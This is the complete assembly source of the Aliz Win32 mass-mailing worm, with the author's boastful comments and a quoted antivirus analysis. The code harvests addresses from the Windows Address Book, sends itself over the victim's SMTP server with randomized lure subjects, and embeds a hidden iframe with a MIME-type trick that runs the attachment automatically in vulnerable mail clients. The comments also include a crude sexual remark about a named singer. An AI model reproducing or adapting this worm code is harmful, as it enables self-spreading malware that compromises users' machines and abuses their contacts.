comment $

ey, this comment is added 21 november 2001. i saw that aliz is spreading
pretty, so just some more about-text then the original release (i thought it
would be a worm that nobody would ever know :).

well, i wrote this worm long ago, in about two days, just cause i was bored.
it was around the time that the iframe sploit was 1-day old, thats all i re-
member and i have no clue how long ago that was.

anyway, i wanted to code a small worm. i did it, but what then? i didn't wanna
drop it itw cause massmailers are lame. (the total worm is lame, really).
so i decided that it would be nice for coderz #2... that was going to be
released around that days (heheheheeheh a half year later now i write this
text and it still getting released soon). anyway, thats why that text is in
it. i had to fill much space, so thats why that huge stupid text.

anyway, coderz#2 wasn't getting released for weeks, months, etc, so i decided
to fork the AV's a sample, and i uploaded it to my site, as a binary, in a
zip file with a secret password, as a test sample.

nothing happens and i forgot the total fuck worm. although avx wrote a
description very fast because they are lame.

well, 19 november i was just checking f-secure.com, because they have nice
a special section pictures of viruses (payloads) in their description part,
and what did i see: aliz. in the wild...

woowwie ;)

now it is high risk blabla on many av sites...

well, its a lame worm, and i didn't care really cause nobody would really
see it (look over the source). anyway, now it differs a lil i guess ;)

heh.

greetings

mar00n (a lame nick too)


description, today i pick f-secure because its the most complimentous desc. ;)

btw, 'in pure Assembly', did they recognize it or was it because of my text
in the body?: '..power in pure win32asm..' hehe ;))

------------------------------------------------------------------------------
Aliz is a very small e-mail worm written in pure Assembly. It appeared in the
wild on 18-20th of November 2001. The worm's file is only 4 kilobytes long
and its code is compressed. It can be considered one of the smallest Win32
worms ever created.

When the worm is run, it first unpacks itself and then passes control to API
address setup routine. When all needed API addresses are collected, the
control is passed to the main worm's code. The worm checks the Registry for
the location of Windows Address Book file and loads it into memory. The worm
then connects to default SMTP server (for SMTP server info the worm checks
Internet Accound Manager data in the Registry) and sends itself to all
recepients of Windows Address Book. The infected message looks like that:



 Subject: <randomly composed from 5 different parts, see below>
 Body: <empty multi-part MIME message with HTML formatting and i-frame trick>
 Attachment: Whatever.exe

The subject of infected message is randomly composed from 5 different parts: 



 Fw:
 Fw: Re:



 Cool
 Nice
 Hot
 some
 Funny
 weird
 funky
 great
 Interesting
 many



 website
 site
 pics
 urls
 pictures
 stuff
 mp3s
 shit
 music
 info



 to check
 for you
 i found
 to see
 here
 - check it



 !!
 !
 :-)
 ?!
 hehe ;-)

For example a subject can be: "Fw: Cool pictures i found !!" or
"Nice website to check hehe ;-)".

The message contains a MIME-encoded attachment - the worm's file with
'Whatever.exe' name. The body is an empty multi-part MIME message with HTML
formatting and i-frame trick that was previously found in Nimda and Klez
worms. Because of this trick on some systems the worm is able to self-launch
itself when an infected e-mail is viewed (for example, with Outlook and
IE 5.0 or 5.01). To do this the worm uses a known vulnerability in IE that
allows execution of an email attachment. This vulnerability is fixed and a
patch for it is available on Microsoft site:

http://www.microsoft.com/windows/ie/downloads/critical/q290108/default.asp 

The worm doesn't install itself to system, it runs, sends itself out and
terminates its process.

The worm contains the following text strings that are never displayed: 



 :::iworm.alizee.by.mar00n!ikx2oo1:::



 while typing this text i realize this text got added on many av
 description sites, because this silly worm could be easily a
 hype. i wonder which av claims '[companyname] stopped high risk
 worm before it could escape!' or shit like that. heh, or they
 boycot my virus because of this text. well, it is easy enough
 for the poor av's to add this worm; since it was only released
 as source in coderz#2... btw, loveletter*2 power in pure win32asm
 and only a 4k exe file. heh, vbs kiddies, phear win32asm. :)
 thx to: bumblebee!29a, asmodeus!ikx. greets to: starzer0!ikx,
 t-2000!ir, ultras!mtx & sweet gigabyte...
 btw,burgemeester van sneek: ik zoek nog een baantje...
 (alignmentfillingtext)

F-Secure Anti-Virus detects Aliz worm with the latest updates. 

[Analysis: Alexey Podrezov; F-Secure Corp.; November 19th, 2001] 

------------------------------------------------------------------------------


well and here the old comment

$

comment $

iworm alizee by mar00n ! ikx 2oo1

alizee is a worm that mails itself around to all addies in your addressbook.

not very special, is it?

well:

       1-it shows that the stack is your best friend
       2-the generated exe file is only 4096 bytes
       3-it shows a clean compatible way in win32asm to obtain email addies
       4-the subject is random generated
       5-the attached exe file gets automatically executed if the reader
         tries to read the message
       6-the whole thing is very clean written (who cares)

indeed, very standard, except step 2 and 5 ;)

more about them:

step 2: yes, its very small, the code is compressed using aplib, and
        decompressed using my own tweaked optmized aplib decompressor

step 5: indeed, this means loveletter power*10. (code? search for <html> tag)


succesfully tested under win98 & win2k... its nice to talk with your creation
using netcat ;)

220 hi
helo localhost
250 ey man ;) wassup? do you have mail to send?
mail from: some@one.com
250 and to who?
rcpt to: sucker@microsoft.com
250 seems ok to me
data
354 go ahead ;) ... but don't forget the cr.cr, ok?

blablablla

well erh, this worm is very hard to compile, see my zip file for the bat files
and external programs you need.


thx:            bumblebee       for your base64 routines
                asmodeus        for the first one doing this

grtz/fear:      starzer0,billy,lifewire,vecna,z0mbie,t2k,benny,ratter,griyo
                and gig

ps, i don't love alizee or what. she's just ... highly fuckable?

$
.386p
.model flat
locals __

include c:\tasm\inc\myinc.inc

sizer   equ 4098

binsize equ sizer + 3-(3-(sizer mod 3))         ;stupid 3-alignment for base64


_call   macro   api
        call    dword ptr [api]
        endm

maxspread       equ     666                     ;max mail to n addies

include c:\tasm\inc\win32api.inc                ;luv to jackyqwerty
include c:\tasm\inc\useful.inc
include c:\tasm\inc\winsock.inc

;extrn   LoadLibraryA:proc;
;extrn   GetProcAddress:proc;

;----------------------------------------------------------------------------;
_CODE           segment dword use32 public 'CODE'
start:          nop                                     ;heh

_CODE           ends
;----------------------------------------------------------------------------;

.data                           ;only to use virtual offset 402000
;                int     3
               
                call    overseh

                jmp     $       ;if seh we simply hang. why not? :)

                overseh:
                xor     edx,edx
                push    dword ptr fs:[edx]
                mov     fs:[edx],esp

;----------------------------------------------------------------------------;
                ;ebx=module base/handle
                ;esi=crc32s
                ;edi=wheretostore

                mov     esi,offset apicrcs
                mov     edi,offset apis

                call    __x
                db      "KERNEL32",0
                __x:

i_importall_loop:
;                call    LoadLibraryA
                call    dword ptr [start+2034h]         ;loadlibrary
                xchg    eax,ebx
                call    i_importapis                    ;first import k32
                xor     eax,eax
                lodsb
                xchg    eax,ecx
                jecxz   i_importall_done                ;modulenamelength
                push    esi
                add     esi,ecx
                jmp     i_importall_loop
;----------------------------------------------------------------------------;

i_importall_done:

                sub     esp,size stackframe
                
                sub     esp,size stack2
                mov     ebp,esp

;                int     3

                call    __y
                db      "Software\Microsoft\WAB\WAB4\Wab File Name",0
                __y:
                push    0
                call    readregkey

                lea     esi,[ebp.buffer]

                add     esp,size stack2
                or      eax,eax
                jnz     exit

                ;esp = filename of wab we choose

                mov     ebp,esp

                call    openfile
                jc      exit

                ;esi = wabmapview (nice name;)

                ;int     3

                mov     ecx,[esi+64h]                   ;number of adds
                jecxz   exit                            ;victim has no friends
                add     esi,[esi+60h]                   ;pointer addies

;                dec     ecx

;                cmp     ecx,maxspread
;                jbe     mailaround
;                push    maxspread
;                pop     ecx

                ;parse wab file for addies & mail the fun

mailaround:
                push    ecx

                mov     eax,esi
                cmp     byte ptr [esi+1],0
                jne     nounicode


                push    esi                             ;unicode support
                lea     edi,[ebp.addie]
                push    edi

                push    48h
                pop     ecx
__y:
                lodsw
                stosb
                loop    __y

                pop     eax                             ;ebp+addie
                pop     esi                             ;esi in wab.addresses
                add     esi,20h

nounicode:
;                int     3
                push    ebp
                call    share                           ;share the fun
                pop     ebp

                add     esi,24h

                pop     ecx
                loop    mailaround

                push    [ebp.createhandle]              ;close wabfilehandle
                push    [ebp.maphandle]
                push    [ebp.viewhandle]
                _call   CloseHandle
                _call   CloseHandle
                _call   CloseHandle

exit:           add     esp,size stackframe

                pop     dword ptr fs:[0]
                pop     eax

                push    0
                _call   ExitProcess

db      ":::iworm.alizee.by.mar00n!ikx2oo1:::",0dh,0dh

db      "while typing this text i realize this text got added on many av",0dh
db      "description sites, because this silly worm could be easily a",0dh
db      "hype. i wonder which av claims '[companyname] stopped high risk",0dh
db      "worm before it could escape!' or shit like that. heh, or they",0dh
db      "boycot my virus because of this text. well, it is easy enough",0dh
db      "for the poor av's to add this worm; since it was only released",0dh
db      "as source in coderz#2... btw, loveletter*2 power in pure win32asm",0dh
db      "and only a 4k exe file. heh, vbs kiddies, phear win32asm. :)",0dh
db      "thx to: bumblebee!29a, asmodeus!ikx. greets to: starzer0!ikx,",0dh
db      "t-2000!ir, ultras!mtx & sweet gigabyte...",0dh
db      "btw,burgemeester van sneek: ik zoek nog een baantje...",0dh
db      "(alignmentfillingtext)",0dh


;----------------------------------------------------------------------------;

share:          push    esi
                mov     esi,eax

                sub     esp,size stack2                 ;some workspace
                mov     ebp,esp

                push    ebp
                push    101h
                _call   WSAStartup                      ;startup wsock services

                push    0
                push    1
                push    2                               
                _call   socket                          ;create socket
                xchg    eax,edi

                push    25                              ;convert port to big/
                _call   htons                           ;lil endian

                mov     word ptr [ebp.sockaddr_in \
                                 .sin_family],AF_INET   ;setup connect info
                mov     [ebp.sockaddr_in.sin_port],ax

                push    offset szRegAccountInfo
                call    __porn
                db      "SMTP Server",0
                __porn:
                call    readregkey
                jc      share_xit

                ;ebx = smtp server name from registry

                push    ebx
                _call   gethostbyname                   ;resolve

                or      eax,eax
                jz      share_xit

                mov     eax,[eax+12]                    ;no clue what i'm
                mov     eax,[eax]                       ;doing here. ctrl+c/v
                mov     eax,[eax]                       ;from my other source
                                                        ;but i hope eax=IP ;)

                mov     dword ptr [ebp.sockaddr_in.sin_addr],eax

                push    size ssockaddr_in
                lea     eax,[ebp.sockaddr_in]
                push    eax
                push    edi                     ;handle
                _call   connect
                or      eax,eax
                jnz     share_xit
                
                ;int     3

                mov     ebx,offset maildata
                call    sendstrings                     ;mail ourself

clean_xit:
                push    edi
                _call   closesocket
                _call   WSACleanup                      ;disconnect

share_xit:
                add     esp,size stack2
                pop     esi
                ret

;----------------------------------------------------------------------------;


sendstrings:    
                xchg    ebx,esi         ;ebx is now dest. email. add. esi=data
                                        ;and edi is socket handle

parsemaildata:  xor     eax,eax
                lodsb
                cmp     al,8
                ja      nsend
                or      al,al
                jz      parsemaildata

                jmp     [fntable-4+eax*4]



nsend:          dec     esi
                call    stringsend
                jmp     parsemaildata




fntable         dd      offset checkmailinput
                dd      offset sendmailfrom
                dd      offset sendmailto
                dd      offset senddate
                dd      offset sendsubject
                dd      offset sendbase64
                dd      offset exitexit

sendbase64:     ;int     3

                pushad

                push    binsize*4                ;oursize*2+base64space
                push    0
                _call   GlobalAlloc
                push    eax             ;one push for globalfree
                push    eax             ;one push for base64 fun                      

                xchg    eax,edi

                push    0
                _call   GetModuleHandleA

                xchg    eax,esi

                xor     ecx,ecx

;                mov     ecx,200h/4
                mov     ch,2
        rep     movsb                                   ;200h bytes

                add     esi,(1000h-200h)
                        
;                mov     ecx,0a00h/4
                mov     ch,0ah
        rep     movsb                                   ;a00h bytes

                add     esi,(2000h-0a00h)

;                mov     ecx,400h/4
                mov     ch,2
        rep     movsb                                   ;200h

                add     esi,(1000h-400h)

;                mov     ecx,200h/4
                mov     ch,2
        rep     movsb                                   ;200h
                

                pop     eax                             ;src
                lea     edx,[eax+binsize+100h]          ;dest
                push    edx
                mov     ecx,binsize                     ;in

                call    encodebase64
                mov     dword ptr [edx],0a0d3dh         ; '=/cr/lf/z'
                pop     esi
                mov     edi,[esp.Pushad_edi+4]          ;jqwerty forever :)
                call    stringsend

                _call   GlobalFree

                popad
                
                jmp     parsemaildata

;----------------------------------------------------------------------------;
checkmailinput: push    0
                push    300h
                lea     eax,[ebp.buffer]
                push    eax
                push    edi                     ;handle
                _call   recv

                lodsw
                cmp     word ptr [ebp.buffer],ax        ;codes match?
                je      parsemaildata
                ret                     ;no good code -return to clean_xit
;----------------------------------------------------------------------------;

;----------------------------------------------------------------------------;
sendmailfrom:   push    esi


;                call    __a
;fromwho         db      "test@localhost",0
;                __a:
;                pop     esi

                push    ebx

                push    offset szRegAccountInfo
                call    __s
                db      "SMTP Email Address",0
                __s:
                call    readregkey
                mov     esi,ebx
                pop     ebx
                call    stringsend                      ;well guess. test! :)

                pop     esi
smfx:           jmp     parsemaildata
;----------------------------------------------------------------------------;

;----------------------------------------------------------------------------;
sendmailto:     push    esi
                mov     esi,ebx              
                call    stringsend
                pop     esi
smtx:           jmp     smfx
;----------------------------------------------------------------------------;

;----------------------------------------------------------------------------;
senddate:       pushad
                ;int     3

                push    edi
                lea     edi,[ebp.buffer]
                push    edi

                push    100
                push    edi
                call    __x
formdate        db      "ddd,dd MMM yyyy",0
                __x:
                push    0
                push    0
                push    409h
                _call   GetDateFormatA
                add     edi,eax
                dec     edi
                mov     al,' '
                stosb

                push    100
                push    edi
                call    __y
formtime        db      "HH:mm:ss",0
                __y:
                push    0
                push    0
                push    409h
                _call   GetTimeFormatA
                add     edi,eax
                dec     edi
                mov     eax,'00- '
                stosd
                mov     eax,03030h
                stosd                           ;barf

                pop     esi
                pop     edi
                call    stringsend

                popad

gsxx:           jmp     smtx
;----------------------------------------------------------------------------;

;----------------------------------------------------------------------------;
exitexit:       ;int     3
                ret
;----------------------------------------------------------------------------;


;----------------------------------------------------------------------------;
sendsubject:    pushad
                ;int     3

                mov     esi,offset gendata
                push    edi
                lea     edi,[ebp.buffer]
                push    edi

hehe:
                xor     eax,eax
                lodsb

                cmp     al,31
                je      done

                call    get_rnd_range
                xchg    eax,ecx

__l:            or      ecx,ecx
                jz      __b
__f:            lodsb
                or      al,al
                jnz     __f
                loop    __l

__b:            lodsb
                cmp     al,0
                je      __d
                stosb
                jmp     __b
__d:            mov     al,' '
                stosb
                
__g:            lodsb
                cmp     al,0
                je      __g
                cmp     al,' '
                jae     __g
                dec     esi
                jmp     hehe

done:
                mov     al,0
                stosb
                pop     esi
                pop     edi
                call    stringsend
                popad
                jmp     gsxx
 
gendata db      5
        db      0
        db      0
        db      0
        db      "Fw:",0
        db      "Fw: Re:",0

        db      11
        db      0
        db      "Cool",0
        db      "Nice",0
        db      "Hot",0
        db      "some",0
        db      "Funny",0
        db      "weird",0
        db      "funky",0
        db      "great",0
        db      "Interesting",0
        db      "many",0

        db      10
        db      "website",0
        db      "site",0
        db      "pics",0
        db      "urls",0
        db      "pictures",0
        db      "stuff",0
        db      "mp3s",0
        db      "shit",0
        db      "music",0
        db      "info",0

        db      7
        db      "to check",0
        db      "for you",0
        db      "i found",0
        db      "to see",0
        db      "here",0
        db      "- check it",0
        db      0
        
        db      6
        db      "!!",0
        db      "!",0
        db      ":-)",0         ;lets use lame cool-to-newbies smileys ;P
        db      "?!",0
        db      "hehe ;-)",0
        db      0

        db      31              ;terminator

        
;----------------------------------------------------------------------------;

;----------------------------------------------------------------------------;
stringsend:     push    esi

                xor     ecx,ecx
                dec     ecx

__x:            lodsb
                inc     ecx
                cmp     al,8
                ja      __x
               
                pop     esi
                push    ecx

                push    0                       ;flags
                push    ecx                     ;length
                push    esi                     ;datastart
                push    edi                     ;handle
                _call   send

                pop     ecx

;                push    10
;                _call   Sleep

                add     esi,ecx
                ret
;----------------------------------------------------------------------------;

get_rnd_range:  push    ecx                     ;luv to griyo
                push    edx
                mov     ecx,eax
                call    get_rnd32
                xor     edx,edx
                div     ecx
                mov     eax,edx
                pop     edx
                pop     ecx
                ret


get_rnd32:                                      ;Stolen from prizzy's Crypto
                push    ebx ecx edx
                mov     eax,dword ptr [ebp.rnd32seed]
                mov     ecx,41C64E6Dh
		mul	ecx
		xchg	eax,ecx
                _call    GetTickCount
		mov	ebx,eax
                db      0Fh, 31h                ;RDTCS instruction - read
		xor	eax,ebx
		xchg	ecx,eax 		;PCs ticks to EDX:EAX
		mul	ecx
		add	eax,00003039h
                mov     dword ptr [ebp.rnd32seed],eax
		pop	edx ecx ebx
		ret

;----------------------------------------------------------------------------;

encodebase64:   ; encodeBase64 by Bumblebee. All rights reserved ;)
; input:
;       EAX = Address of data to encode
;       EDX = Address to put encoded data
;       ECX = Size of data to encode
; output:
;       ECX = size of encoded data
;
        xor     esi,esi 
        call    over_enc_table
        db      "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        db      "abcdefghijklmnopqrstuvwxyz"
        db      "0123456789+/"
over_enc_table:
        pop     edi
        push    ebp
        xor     ebp,ebp
baseLoop:
        movzx   ebx,byte ptr [eax]
        shr     bl,2
        and     bl,00111111b
        mov     bh,byte ptr [edi+ebx]
        mov     byte ptr [edx+esi],bh
        inc     esi

        mov     bx,word ptr [eax]
        xchg    bl,bh
        shr     bx,4
        mov     bh,0
        and     bl,00111111b
        mov     bh,byte ptr [edi+ebx]
        mov     byte ptr [edx+esi],bh
        inc     esi

        inc     eax
        mov     bx,word ptr [eax]
        xchg    bl,bh
        shr     bx,6
        xor     bh,bh
        and     bl,00111111b
        mov     bh,byte ptr [edi+ebx]
        mov     byte ptr [edx+esi],bh
        inc     esi

        inc     eax
        xor     ebx,ebx
        movzx   ebx,byte ptr [eax]
        and     bl,00111111b
        mov     bh,byte ptr [edi+ebx]
        mov     byte ptr [edx+esi],bh
        inc     esi
        inc     eax

        inc     ebp
        cmp     ebp,24
        jna     DontAddEndOfLine

        xor     ebp,ebp                         ; add a new line
        mov     word ptr [edx+esi],0A0Dh
        inc     esi
        inc     esi
        test    al,00h                          ; Optimized (overlap rlz!)
        org     $-1
DontAddEndOfLine:
        inc     ebp
        sub     ecx,3
        or      ecx,ecx
        jne     baseLoop

        mov     ecx,esi
        add     edx,esi
        pop     ebp
        ret
;----------------------------------------------------------------------------;

;----------------------------------------------------------------------------;
readregkey:
                lea     eax,[ebp.regkeyhnd]
                push    eax
                push    dword ptr [esp+3*4]
                push    80000001h  ;hkey current user
                _call   RegCreateKeyA
                or      eax,eax
                jnz     rrke      

more_data:      push    127
                push    esp
                lea     ebx,[ebp.buffer]
                push    ebx
                push    0
                push    0
                push    dword ptr [esp+18h]
                push    [ebp.regkeyhnd]
                _call   RegQueryValueExA               ;read stmp server
                pop     ecx
                cmp     eax,234
                je      more_data               ;??
                or      eax,eax
                jnz     rrke       

                push    [ebp.regkeyhnd]
                _call   RegCloseKey
                clc
                ret     8

rrke:           stc
                ret     8
;----------------------------------------------------------------------------;

;----------------------------------------------------------------------------;
openfile:       xor     ebx,ebx
                push    ebx
                push    FILE_ATTRIBUTE_NORMAL
                push    OPEN_EXISTING
                push    ebx
                push    ebx                               
                push    GENERIC_READ or GENERIC_WRITE
                push    esi
                _call   CreateFileA
                inc     eax
                jz      foerroropening
                dec     eax
                mov     dword ptr [ebp.createhandle],eax
        
                push    ebx
                push    ebx                                     ;max size low
                push    ebx
                push    PAGE_READWRITE
                push    ebx
                push    eax                                     ;handle
                _call   CreateFileMappingA
                mov     dword ptr [ebp.maphandle],eax

                push    ebx
                push    ebx
                push    ebx
                push    FILE_MAP_WRITE
                push    eax                             ;handle
                _call   MapViewOfFile
                mov     dword ptr [ebp.viewhandle],eax
                xchg    eax,esi
                clc
                ret
foerroropening: stc
                ret
;----------------------------------------------------------------------------;

                ;       ebx=module base/handle
                ;       edi=where to store
                ;       esi=crc32 stuff
i_importapis:
                mov     eax,[ebx+03ch]                  ;pointer to PE
                mov     edx,[eax+ebx+78h]               ;export section
                add     edx,ebx

i_ia_nextone:
                lodsd
                or      eax,eax
                jz      i_ia_done
                push    esi
                xchg    eax,ecx                         ;ecx=desired crc32

                mov     esi,[edx+8*4]                   ;addresses of ApiNames
                add     esi,ebx
i_ia_find:
                lodsd                                   ;address
                push    esi
                add     eax,ebx                         ;add base
                push    eax                             ;save base for later
                xchg    eax,esi
                call    v_crc32
                cmp     eax,ecx                         ;actual crc32=desired?
                pop     eax
                pop     esi
                jne     i_ia_find                       ;nope.. then next

                push    edx                             ;preserve edx

                push    eax                             ;eax=name
                push    ebx
;                call    GetProcAddress
                call    dword ptr [start+2038h]

                pop     edx

                stosd

                pop     esi
                jmp     i_ia_nextone
i_ia_done:
                ret

v_crc32:                                        ;ofcourse i stole this... :)
		push	edx
                mov     edx,09C3B248Eh
	__gCRC32_next_byte:
		lodsb
		or	al,al			;end of name ?
		jz	__gCRC32_finish

		xor	dl,al
		mov	al,08h
	__gCRC32_next_bit:
		shr	edx,01h
		jnc	__gCRC32_no_change
                xor     edx,0C1A7F39Ah
	__gCRC32_no_change:
		dec	al
		jnz	__gCRC32_next_bit
		jmp	__gCRC32_next_byte
	__gCRC32_finish:
		xchg	eax,edx 		;CRC32 to EAX
		pop	edx
		ret




szRegAccountInfo db      "Software\Microsoft\Internet Account Manager\Accounts\00000001",0

mCheck  equ 1            ;recv/checkfor
mFromAd equ 2            ;mailfrom addy
mDestAd equ 3            ;sendto addy
mTime   equ 4            ;right time/date field
mSubj   equ 5            ;random generated subject
mBase64 equ 6            ;base64 data
mEom    equ 7            ;endofmail


;----------------------------------------------------------------------------;
;       ***             the email data                  ***                  ;


;                       smtp commands
;----------------------------------------------------------------------------;

crlf equ 0dh,0ah
crlfz equ crlf,0
maildata        db      mCheck,'22'                     ;--check 220 greet
                db      'HELO localhost',crlf           ;HELO localhost
                db      mCheck,'25'                     ;--check 250
                db      'MAIL FROM: ',mFromAd,crlf      ;MAIL FROM: addie
                db      mCheck,'25'                     ;--check 250
                db      'RCPT TO: ',mDestAd,crlf        ;RCPT TO: addie
                db      mCheck,'25'                     ;--check 250
                db      'DATA',crlf                     ;DATA
                db      mCheck,'35'                     ;--check 354

;                       stupid default stuph
;----------------------------------------------------------------------------;

db 'From: ',mFromAd,crlf
db 'To: ',mDestAd,crlf
db 'Subject: ',mSubj,crlf
db 'Date: ',mTime,crlf

                        ;mime headers
;----------------------------------------------------------------------------;

db 'MIME-Version: 1.0',crlf
db 'Content-Type: multipart/mixed;',crlf
db '        boundary="bound"',crlf
db '        X-Priority: 3',crlf
db '        X-MSMail-Priority: Normal',crlf
db '        X-Mailer: Microsoft Outlook Express 5.50.4522.1300',crlf
db '        X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1300',crlf
db crlf
db 'This is a multi-part message in MIME format.',crlf
db crlf

                        ;first part: html code to run the sploit
;----------------------------------------------------------------------------;

db '--bound',crlf
db 'Content-Type: text/html;',crlf
db '        charset="iso-8859-1"',crlf
db 'Content-Transfer-Encoding: quoted-printable',crlf
db crlf
db '<HTML><HEAD></HEAD><BODY><iframe src=3Dcid:SOMECID height=3D0 width=3D0></iframe>',crlf
db '<font>peace</font></BODY></HTML>',crlf
db crlf

                        ;next part - the sploit
;----------------------------------------------------------------------------;

db '--bound',crlf
db 'Content-Type: audio/x-wav;',crlf
db '        name="whatever.exe"',crlf
db 'Content-Transfer-Encoding: base64',crlf
db 'Content-ID: <SOMECID>',crlf
db crlf

                        ;base64 stuff
;----------------------------------------------------------------------------;
db mBase64

                        ;end boundary & quit command
;----------------------------------------------------------------------------;
                
db crlf,'--bound--',crlf,'.',crlf
db 'QUIT',crlf,mEom

;----------------------------------------------------------------------------;

apicrcs:
crc32m  <GetWindowsDirectoryA>
crc32m  <CloseHandle>
crc32m  <ExitProcess>
crc32m  <GlobalAlloc>
crc32m  <GetModuleHandleA>
crc32m  <GlobalFree>
crc32m  <GetDateFormatA>
crc32m  <GetTimeFormatA>
crc32m  <Sleep>
crc32m  <GetTickCount>
crc32m  <CreateFileA>
crc32m  <CreateFileMappingA>
crc32m  <MapViewOfFile>
        dd      0

        db              9
        db              "ADVAPI32",0
crc32m  <RegCreateKeyA>
crc32m  <RegQueryValueExA>
crc32m  <RegCloseKey>
dd      0

        db 8
        db "WSOCK32",0
crc32m  <WSAStartup>
crc32m  <socket>
crc32m  <htons>
crc32m  <gethostbyname>
crc32m  <connect>
crc32m  <closesocket>
crc32m  <recv>
crc32m  <send>
crc32m  <WSACleanup>
        dd      0
        db      0


db      "END"

apis:

GetWindowsDirectoryA    dd      ?
CloseHandle    dd      ?
ExitProcess    dd      ?
GlobalAlloc    dd      ?
GetModuleHandleA    dd      ?
GlobalFree    dd      ?
GetDateFormatA    dd      ?
GetTimeFormatA    dd      ?
Sleep    dd      ?
GetTickCount    dd      ?
CreateFileA    dd      ?
CreateFileMappingA    dd      ?
MapViewOfFile    dd      ?


RegCreateKeyA    dd      ?

RegQueryValueExA    dd      ?
RegCloseKey    dd      ?


WSAStartup    dd      ?
socket    dd      ?
htons    dd      ?
gethostbyname    dd      ?
connect    dd      ?
closesocket    dd      ?
recv    dd      ?
send    dd      ?
WSACleanup    dd      ?

        

totalend:

stackframe      struc

createhandle    dd      ?
maphandle       dd      ?
viewhandle      dd      ?
addie           db      48h dup (?)

stackframe      ends



stack2          struc

regkeyhnd       dd      ?
sockaddr_in     ssockaddr_in ?
buffer          db 300h dup (?)
rnd32seed       dd      ?
;space           WSADATA ?
ends

        end     start
        end